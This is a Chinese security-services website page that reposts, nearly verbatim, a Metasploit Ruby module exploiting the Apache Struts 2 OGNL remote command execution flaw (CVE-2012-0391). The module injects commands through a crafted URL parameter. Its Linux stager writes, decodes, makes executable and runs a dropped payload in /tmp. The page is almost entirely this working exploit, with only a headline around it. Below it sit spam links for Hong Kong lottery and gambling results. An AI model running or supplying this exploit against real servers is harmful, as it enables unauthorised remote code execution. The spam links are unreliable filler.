Apache Struts 2.2.1.1远程命令执行漏洞_安全漏洞聚焦_龙虎鹰师网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

Apache Struts 2.2.1.1远程命令执行漏洞

作者:龙虎鹰师网安Apache教程网 来源:龙虎鹰师网安Apache教程网 浏览次数:0

本篇关键词:Apache
龙虎鹰师网安网讯:Apache Struts最新漏洞公布:Apache Struts 2.2.1.1远程命令执行漏洞(Apache Struts

################################################################

# This file is part of the Metasploit Framework and may be subject to 

# redistribution and commercial restrictions. Please see the Metasploit 

# web site for more information on licensing and terms of use. 

#  http://metasploit.com/ 

################################################################ 

  
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote 

    Rank = ExcellentRanking 

  

    include Msf::Exploit::CmdStagerTFTP 

    include Msf::Exploit::Remote::HttpClient 

  

    def initialize(info = {}) 

        super(update_info(info, 

            'Name'           => 'Apache Struts <= 2.2.1.1 Remote Command Execution', 

            'Description'    => %q{ 

                    This module exploits a remote command execution vulnerability in

                Apache Struts versions < 2.2.1.1. This issue is caused because the 

                ExceptionDelegator interprets parameter values as OGNL expressions 

                during certain exception handling for mismatched data types of properties, 

                which allows remote attackers to execute arbitrary Java code via a 

                crafted parameter. 

            }, 

            'Author'         => 

                [ 

                    'Johannes Dahse', # Vulnerability discovery and PoC 

                    'Andreas Nusser', # Vulnerability discovery and PoC 

                    'juan vazquez', # Metasploit module 

                    'sinn3r' # Metasploit module 

                ], 

            'License'        => MSF_LICENSE, 

            'Version'        => '$Revision: $', 

            'References'     => 

                [ 

                    [ 'CVE', '2012-0391'], 

                    [ 'OSVDB', '78277'], 

                    [ 'EDB', '18329'], 

                    [ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt'] 

                ], 

            'Platform'      => [ 'win', 'linux'], 

            'Privileged'     => true, 

            'Targets'        => 

                [ 

                    ['Windows Universal', 

                        { 

                                'Arch' => ARCH_X86, 

                                'Platform' => 'win'

                        } 

                    ], 

                    ['Linux Universal', 

                        { 

                                'Arch' => ARCH_X86, 

                                'Platform' => 'linux'

                        } 

                    ], 

                ], 

            'DisclosureDate' => 'Jan 06 2012', 

            'DefaultTarget' => 0)) 

  

            register_options( 

                [ 

                    Opt::RPORT(8080), 

                    OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]), 

                    OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ]) 

                ], self.class) 

    end

   def execute_command(cmd, opts = {}) 

  

        uri = String.new(datastore['TARGETURI']) 

        uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'

        uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'

        uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd)) 

  

        vprint_status("Attempting to execute: #{cmd}") 

  

        resp = send_request_raw({ 

            'uri'     => uri, 

            'version' => '1.1', 

            'method'  => 'GET', 

        }, 5) 

   end

   def windows_stager 

        exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

  

        print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") 

        execute_cmdstager({ :temp => '.'}) 

        @payload_exe = payload_exe 

  

        print_status("Attempting to execute the payload...") 

        execute_command(@payload_exe) 

    end

   def linux_stager 

        cmds = "/bin/sh@-c@echo LINE | tee FILE"

        exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) 

        base64 = Rex::Text.encode_base64(exe) 

        base64.gsub!(/\=/, "\\u003d") 

        file = rand_text_alphanumeric(4+rand(4)) 

  

        execute_command("/bin/sh@-c@touch /tmp/#{file}.b64") 

        cmds.gsub!(/FILE/, "/tmp/" + file + ".b64") 

        base64.each_line do |line| 

            line.chomp! 

            cmd = cmds 

            cmd.gsub!(/LINE/, line) 

            execute_command(cmds) 

        end

  

        execute_command("/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}") 

        execute_command("/bin/sh@-c@chmod +x /tmp/#{file}") 

        execute_command("/bin/sh@-c@rm /tmp/#{file}.b64") 

  

        execute_command("/bin/sh@-c@/tmp/#{file}") 

        @payload_exe = "/tmp/" + file 

    end

   def on_new_session(client) 

        if target['Platform'] == 'linux'

            print_status("Deleting #{@payload_exe} payload file") 

            execute_command("/bin/sh@-c@rm #{@payload_exe}") 

        else

            print_status("Windows does not allow running executables to be deleted") 

            print_status("Delete the #{@payload_exe} file manually after migrating") 

        end

    end

   def exploit 

        if not datastore['CMD'].empty? 

            print_status("Executing user supplied command") 

            execute_command(datastore['CMD']) 

            return

        end

  

        case target['Platform'] 

            when 'linux'

                linux_stager 

            when 'win'

                windows_stager 

            else

                raise RuntimeError, 'Unsupported target platform!'

        end

  

        handler 

    end

end

    龙虎鹰师网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-17260-1.html
网站维护教程更新时间:2012-09-12 00:12:48  【打印此页】  【关闭
  • 香港正版综合资枓大全, 到香港来什么生肖
  • 990033夜明珠ymzo29900888藏宝阁开奖结果9900888藏宝阁香港马会资料
  • 香港最快开奖结果查询320999, 香港翡翠j2台直播
  • 0820香港九龙官网直播, 香港九龙高手现场直播
  • 香港正版挂牌9肖期期中香港正版挂牌另版香港正版挂牌最快最新
  • 四不像生肖图2018, 香港马会正版四不像图唐僧
  • 2018六盒彩生肖牌,香港挂牌心水区,六盒彩特码
  • 香港118图库彩图论坛, 香港三色彩开奖结果查询
  • 观音菩萨心经念诵,观音救世资料
  • 949494开奖结果香港起949494开奖结果香港马报949494曾道救世网
  • 2018白小姐先锋,诗,2018白小姐中特网玄机
  • 2018香港历史开奖记录完整版153,2018香港历史开奖记录完整版
  • 温洲财神爷心水玄机图,温州财神爷心水玄机图
  • 全站连接N点 | 龙虎鹰师网安 |  
    专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。龙虎鹰师网安服务器维护基地招商进行中!请QQ:29769479

    footer  footer  互联网安全  footer